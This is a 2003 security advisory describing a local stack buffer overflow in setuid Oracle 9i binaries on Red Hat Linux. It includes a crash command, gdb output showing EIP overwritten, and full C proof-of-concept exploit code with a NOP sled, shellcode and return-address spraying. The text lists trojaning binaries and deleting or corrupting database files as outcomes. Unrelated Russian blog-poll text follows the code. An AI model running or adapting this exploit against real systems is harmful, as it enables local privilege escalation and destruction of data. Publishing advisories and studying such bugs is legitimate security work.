4

************************************************************

$ An open security advisory #4 - Oracle 9i Database POC Code

************************************************************

1: Bug Researcher: c0ntex@open-security.org

2: Bug Released: October 2003

3: Bug Impact Rate: Hi

4: Bug Scope Rate: Local

*************************************************************

*************************************************************

Oracle 9i installed onto a Redhat 9 x86 node with the latest Oracle patch kit has a generic

stack based buffer overflow.

By passing a large argv[1] input string one is able to overwrite the EIP register with user

controlled data, resulting in a segmentation fault that can be controlled to allow the

execution of arbitrary code.

Effected Binaries:

/database/u00/app/oracle/product/9.2.0.1.0/bin/oracle

/database/u00/app/oracle/product/9.2.0.1.0/bin/oracleO

These binaries become vulnerable to attack because they are made or get set with a +s flag.

This allows users other than `oracle` to attach to restricted sections of the database,

memory segments ....

By exploiting this basic bug, one is presented with the following options:

1) trojan oracle binaries

2) delete key database files

3) corrupt or modify data

4) shutdown abort the database

5) anything else oracle user can do

AIX architecture has also been tested and seems to be vulnerable to the same attack, I

guess that probably every other arch is too.

Local Example:

--------------

bash> `which ulimit` -c 999999

bash> /database/u00/app/oracle/product/9.2.0.1.0/bin/oracle `perl -e 'print "A"x9850'`

Segmentation fault (core dumped)

#0 0x41414141 in ?? ()

(gdb) i r

eax 0x1d16 7446

ecx 0xbfffb5a8 -1073760856

edx 0x41414141 1094795585

ebx 0x41414141 1094795585

esp 0x41414141 0x41414141

ebp 0x41414141 0x41414141

esi 0x41414141 1094795585

edi 0x41414141 1094795585

eip 0x41414141 0x41414141 // WOW

eflags 0x10202 66050

cs 0x23 35

....

******************************************************************************************************************

$ Oracle informed 6 weeks ago, responded same day then no feedback since.

$ Update: Oracle have released a pach wich is available at metalink.oracle.com

******************************************************************************************************************

*/

#include

#include

#include

#include

#define VERSION "Operation_Oracle_Owner_Ownage_Overflow_Oday Version 1.0.1"

#define VULNUBL "oracle"// Vulnerable binary

#define SMASHIT 9850 // Minimum BUFF

#define DEFAULT 2222 // Default RET_OFSET

#define PADDING 0x90 // BUFF PADDING

#define REALUID // ORACLE UserID For Shellcode Testing

//#define BADPAD 15000

/* Oracle UID Shellcode :: "\x31\xc0\xb3"REALUID"\xb0\x46\xcd\x80"; */

char operation_oracle[] = "\x31\xc0\x31\xdb\xfe\xc0\xcd\x80";

unsigned long retrieve_offset()

{

__asm__(

"movl %esp, %eax"

);

}

int main(int argc, char *argv[])

{

char Bucket[SMASHIT];

unsigned long badd_addr;

unsigned short delta = 0x00;

unsigned short i;

if(argc > 1) {

delta = atol(argv[0x01]);

}

else

{

delta = DEFAULT;

}

badd_addr = retrieve_offset() - delta;

printf("\n\n*************************************************************\n"

"*************************************************************\n");

printf("[-] %s\n", VERSION);

printf("[-] -------------------------------------------------------\n"

"[-] An offset value from 1750 - 3500 should work perfectly\n"

"[-] if this does not nail it first time.\n"

"[-] -------------------------------------------------------\n"

"[-] Execute this PoC and attach ltrace with -o to a file so\n"

"[-] you can grep for the goodness - c0ntex@open-security.org\n"

"[-] -------------------------------------------------------\n"

"[-] gcc -Wall -o oracle_owned oracle_owned.c\n"

"[-] Usage: %s offset_value\n", argv[0x00]);

for(i = 0x00; i < SMASHIT; i += 0x04)

*(long *) &Bucket[i] = badd_addr;

for(i = 0x00; i < (SMASHIT - strlen(operation_oracle) - 0x50); i++)

*(Bucket + i) = PADDING;

memcpy(Bucket + i, operation_oracle, strlen(operation_oracle));

printf("[-] Using Return address 0x%lx\n", badd_addr);

printf("[-] Using offset value %d\n", delta);

printf("*************************************************************\n"

"*************************************************************\n\n");

execlp("/database/u00/app/oracle/product/9.2.0.1.0/bin/oracle", VULNUBL, Bucket, NULL);

return 0x00;

}


Ведете ли вы блог?

Да
Нет
Планирую


Результаты опроса

Новостной блок